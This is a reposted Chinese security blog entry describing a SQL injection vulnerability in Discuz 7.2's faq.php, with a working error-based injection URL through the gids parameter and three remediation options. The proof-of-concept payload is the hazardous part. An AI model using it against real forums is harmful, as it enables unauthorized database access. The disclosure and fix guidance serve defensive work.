码迷,mamicode.com
首页 > 数据库 > 详细

Discuz 7.2 /faq.php SQL注入漏洞

时间:2014-07-07 11:53:26      阅读:232      评论:0      收藏:0      [点我收藏+]

标签:discuz   style   http   使用   文件   art   

测试方法:

提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
 
Discuz 7.2 /faq.php SQL注入漏洞
 
http://www.xxx.com/faq.php?action=grouppermission&gids[99]=‘&gids[100][0]=) and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)%23
 
 修复方法:
 

修复文件: faq.php

修复方法(一)
此文件为显示论坛帮助用的,功能相对独立,您可以在服务器禁止该文件的访问,或者直接删除他。对论坛常规功能没有任何影响。

修复方法(二)
可以使用本贴中的附件覆盖您的旧文件

修复方法(三)
手工修复faq.php
用编辑器打开该文件


查找代码:

 } elseif($action == ‘grouppermission‘) {
 
在下面添加:
$gids = array();
 

Discuz 7.2 /faq.php SQL注入漏洞,布布扣,bubuko.com

Discuz 7.2 /faq.php SQL注入漏洞

标签:discuz   style   http   使用   文件   art   

原文地址:http://www.cnblogs.com/security4399/p/3820110.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!